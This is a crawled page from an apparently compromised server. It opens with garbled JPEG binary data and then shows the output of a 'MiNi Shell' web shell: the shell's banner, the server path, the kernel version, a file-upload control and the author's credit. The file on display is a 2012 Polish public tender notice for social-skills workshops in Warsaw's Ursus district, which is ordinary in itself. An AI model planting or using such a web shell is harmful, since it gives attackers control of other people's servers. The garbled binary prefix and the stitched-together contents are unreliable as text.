JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120914/349368-N-2012.html

<p class="kh_header"><b>Warszawa: Realizacja warsztatów umiejętności społecznych dla uczestników projektu Ursusowskie partnerstwo drogą do lepszego życia</b><br>
<b>Numer ogłoszenia: 349368 - 2012; data zamieszczenia: 14.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Dzielnicy Ursus m.st. Warszawy , Plac Czerwca 1976 r. Nr 1, 02-495 Warszawa, woj. mazowieckie, tel. 022 4784111, faks 022 4784101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops-ursus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja warsztatów umiejętności społecznych dla uczestników projektu Ursusowskie partnerstwo drogą do lepszego życia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja warsztatów  z zakresu: komunikacji interpersonalnych, radzenia sobie ze stresem, asertywności, budowania poczucia własnej pewności, motywacji, czyli zarządzania zmianą.

Zamawiający dopuszcza możliwość jednoczesnego prowadzenia zajęć dla 3 grup (tj. dysponuje trzema salami), jednak zastrzega, że jeden i ten sam trener prowadzi  dwudniowe warsztaty dla danej grupy.  
Warsztat Nr 1 
Warsztaty z zakresu komunikacji interpersonalnej dla 45 osób mężczyzn i kobiet - uczestników projektu Ursusowskie partnerstwo drogą do lepszego życia.
Cele i zakres tematyczny warsztatów:
Przekazanie wiedzy na temat konstruktywnej komunikacji interpersonalnej
Praca nad barierami komunikacyjnymi
Ćwiczenie dobrej komunikacji interpersonalnej
Aspekty komunikacji interpersonalnej w środowisku zawodowym

Warsztaty dla 3 grup (15 osób, 15 osób,15 osób) z czego każda grupa ma wypracować 7h zegarowych, razem 1 spotkanie dla każdej z grup. Czas trwania warsztatu dla jednej grupy to 7h zegarowych z uwzględnieniem przerwy na kawę i posiłki. 
Czas pracy 7 h w godzinach rozpoczęcie najwcześniej o godz.: 8.00  zakończenie najpóźniej o 19.00 w tygodniu lub w weekend w godz. 9.00 -16.00 - do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w innych konsultacjach dokładny termin będzie ustalany w trakcie podpisywania umowy.

Warsztat Nr 2 

Warsztaty z zakresu radzenia sobie ze stresem dla 45 osób mężczyzn i kobiet - uczestników projektu Ursusowskie partnerstwo drogą do lepszego życia.
Cele i zakres tematyczny warsztatów:
Przekazanie wiedzy na temat emocji
Nauka radzenia sobie z trudnymi emocjami (złość)
Nauka radzenia sobie z nieprzyjemnymi emocjami (smutek) i wywołującymi stres, napięcie.
Nauka radzenia sobie z emocjami w sytuacjach konfliktowych i trudnych
Trening radzenia sobie z emocjami własnymi i innych osób
Warsztaty dla 3 grup (15 osób, 15 osób,15 osób) z czego każda grupa ma wypracować 7h zegarowych, razem 1 spotkanie dla każdej z grup. Czas trwania warsztatu dla jednej grupy to 7h zegarowe z uwzględnieniem przerwy na kawę i posiłki. 
Czas pracy 7h w godzinach rozpoczęcie najwcześniej o godz.: 8.00  zakończenie najpóźniej o 19.00 w tygodniu  lub w weekend w godz. 9.00 -16.00  do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w innych konsultacjach dokładny termin będzie ustalany w trakcie podpisywania umowy.
Warsztat Nr 3 

Warsztaty z zakresu asertywności dla 45 osób mężczyzn i kobiet - uczestników projektu Ursusowskie partnerstwo drogą do lepszego życia.
Cele i zakres tematyczny warsztatów:
Przekazanie wiedzy na temat asertywności - czym jest, kto to jest osoba asertywna
Ćwiczenie postawy asertywnej w środowisku rodzinnym i zawodowym
Nauka radzenia sobie w sytuacjach trudnych i konfliktowych z wykorzystaniem postawy asertywnej

Warsztaty dla 3 grup (15 osób, 15 osób,15 osób) z czego każda grupa ma wypracować 7h zegarowych, razem 1 spotkanie dla każdej z grup. Czas trwania warsztatu dla jednej grupy to 7h z uwzględnieniem przerwy na kawę.
Czas pracy 7 h w godzinach rozpoczęcie najwcześniej o godz.: 8.00  zakończenie najpóźniej o 19.00 w tygodniu lub w weekend w godz. 9.00 -16.00 do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w innych konsultacjach dokładny termin będzie ustalany w trakcie podpisywania umowy.

Warsztat Nr 4

Warsztaty z zakresu budowania poczucia własnej wartość dla 45 osób mężczyzn i kobiet - uczestników projektu Ursusowskie partnerstwo drogą do lepszego życia.
Cele i zakres tematyczny warsztatów:
Poznanie swoich mocnych i słabych stron;
Zbudowanie pozytywnego obrazu własnej osoby;
Zwiększenie wiary we własne możliwości;
Wzmocnienie samoakceptacji, poczucia pewności siebie i poczucia wartości;
Zwiększenie poczucia sprawczości w sytuacjach osobistych i zawodowych;
Umiejętność budowania pozytywnych przekonań na temat własnej osoby;
Nauka wyrażania i prezentowania swoich mocnych stron;

Warsztaty dla 3 grup (15 osób, 15 osób, 15 osób) z czego każda grupa ma wypracować 7h zegarowych. Czas trwania warsztatu dla jednej grupy 7h zegarowych z uwzględnieniem przerwy na kawę i posiłki. 
Czas pracy 7 h w godzinach rozpoczęcie najwcześniej o godz.: 8.00  zakończenie najpóźniej o 19.00 w tygodniu lub w weekendy w godz. 9.00 -16.00  do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w innych konsultacjach dokładny termin będzie ustalany w trakcie podpisywania umowy.

Warsztat Nr 5

Warsztaty z zakresu motywacji, czyli zarządzanie zmianą dla 45 osób mężczyzn i kobiet - uczestników projektu Ursusowskie partnerstwo drogą do lepszego życia.
Cele i zakres tematyczny warsztatów:
Pozytywne i negatywne aspekty dokonywania zmian
Siły wspierające i siły hamujące zmiany
Techniki wprowadzania zmian
Zmiana w czasie - planowanie zmian, okres przejściowy
Zmiany a rodzina
Wzmocnienie motywacji
Nabycie umiejętności wychodzenia z sytuacji kryzysowych i trudnych
Praca nad pozytywnym myśleniem i odnajdywaniem pozytywnych aspektów
Warsztaty dla 3 grup (15 osób, 15 osób, 15 osób) z czego każda grupa ma wypracować 12h zegarowych, razem 2 spotkania dla każdej z grup. Czas trwania warsztatu dla jednej grupy to 5h i 7h zegarowych z uwzględnieniem przerwy na kawę i posiłki. 
Czas pracy 5h i 7h  w godzinach: rozpoczęcie najwcześniej o godz.: 8.00  zakończenie najpóźniej o 19.00 w tygodniu lub w weekend w godz. 9.00 -16.00 do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w innych konsultacjach dokładny termin będzie ustalany w trakcie podpisywania umowy.
Spotkania będą odbywały się na terenie Dzielnicy Ursus m.st. Warszawy w Ośrodku Pomocy Społecznej Dz. Ursus przy Pl. Czerwca 1976 Nr 1 lub w Kamiliańskiej Misji Pomocy Społecznej, ul. Traktorzystów 26, Warszawa
Zamawiający dopuszcza realizacji warsztatów w weekendy, po każdorazowym uzgodnieniu z koordynatorem projektu. 
Wykonawca przedstawi  cenę za 1 godzinę realizacji warsztatów biorąc pod uwagę następujące wytyczne:

1.	Cena za 60 min warsztatu,  która obejmuje:
a.	Praca trenera
b.	Wykonawca ma obowiązek zapewnienia:
1.	wyposażenie sali stosownie do prowadzonych zajęć: tablica, flipchart + papier, 
i inne narzędzia niezbędne do realizacji warsztatu np. sprzęt audio, komputer etc.
2.	materiały szkoleniowe: segregator, notatnik lub skoroszyt, długopis
3.	testy i narzędzia do diagnozy
c.	Kosztem Wykonawcy jest także przygotowanie
Serwisu kawowego, czyli: kawa, herbata, woda, sok, ciastka kruche, cukier, mleko do kawy oraz zabezpieczenie naczyń jednorazowych
Catering w postaci 2 szt, kanapek dla każdego uczestnika warsztatu (bułka, ser, szynka, warzywo - sałata, ogórek lub pomidor) plus owoc np. jabłko, banan. 
Catering w postaci obiadu (drugie danie).
Obsługa
d.	Kosztem Wykonawcy jest dojazd trenera na miejsce realizowanego przez niego warsztatu i dowóz cateringu.
e.	Prowadzenie dziennika zajęć, listy obecności, kart konsulatacji oraz innych dokumentów przekazanych przez koordynatora projekty zgodnie z wymogami POKL
2.	Do obowiązków trenera należy wypełnienie dziennika trenera (zajęć) i zebranie podpisów na liście obecności. Dokumenty trener lub wyznaczona przez firmę osoba koordynująca działania Wykonawcy przekazuje koordynatorowi projektu i stanowią one podstawę do rozliczenia faktur.
3.	Wyznaczenie osoby koordynującej powyższe działania ze strony Zleceniobiorcy.
4.	Ewaluacja i raport poszkoleniowy sporządzane na koniec warsztatów są przekazywane przez firmę Koordynatorowi projektu i są podstawą do zapłacenia ostatniego rachunku za wykonaną usługę.
5.	Firma powinna być wpisana do rejestru instytucji szkoleniowych Wojewódzkiego Urzędu Pracy właściwego dla siedziby firmy.
Wykonawca załączy do oferty  Opis sposobu realizacji zamówienia będący szczegółowym  programem warsztatów  przygotowanym w oparciu o w/w cele i zakres tematyczny. Wykonawca zamieści w opisie takie informacje jak: 
- metoda prowadzenia zajęć  (pokaz slajdów, zajęcia interaktywne, wykład) 
- rodzaj przygotowanych materiałów dydaktycznych, narzędzi i ćwiczeń warsztatowych 
- szczegółowy program poszczególnych warsztatów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>6.	Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych w wysokości 20% zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub wykaże, że będzie dysponował min. 4 trenerami skierowanymi do wykonania zamówienia, którzy posiadają następujące wykształcenie oraz doświadczenie:
a) wyższe - psychologia lub pedagogika oraz uprawnienia do wykonywania zawodu trenera (ukończona szkoła trenerów lub inne równoważne uprawnienia) 
b) wypracowane  min. 150 godzin warsztatów umiejętności interpersonalnych   w ciągu 3 ostatnich lat 

Na potwierdzenie spełnienia w/w warunku Wykonawca przedstawi CV min. 4 trenerów oraz następujące dokumenty:
a)	kserokopię poświadczoną za zgodność z oryginałem przez Wykonawcę dyplomu studiów wyższych wyżej opisanych oraz dokument potwierdzający posiadanie uprawnień trenera.
b)	wypełniony załącznik nr 3 Personel potwierdzający  wypracowanie min 150 godzin warsztatów w ciągu 3 ostatnich lat wraz z  min.1 referencjami lub innym dokumentem równoważnym (dla każdego trenera)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Opis sposobu realizacji zamówienia - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian do umowy w szczególności zmiany treści i warunków umowy mogą nastąpić w przypadku: 

a)	zmiany liczby osób zrekrutowanych do udziału w warsztatach
b)	zawieszenia przez Zamawiającego wykonywania zamówienia,
c)	działania siły wyższej
d)	jeżeli z powodu nadzwyczajne zmiany stosunków, spełnienie świadczenie byłoby połączone z nadmiernymi trudnościami lub czego strony nie mogły przewidzieć</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops-ursus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Plac Czerwca 1976r Nr 1
02-495 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2012 godzina 10:00, miejsce: Plac Czerwca 1976r Nr 1
02-495 Warszawa
pokój 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Ursusowskie partnerstwo drogą do lepszego życia 
PO KL.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com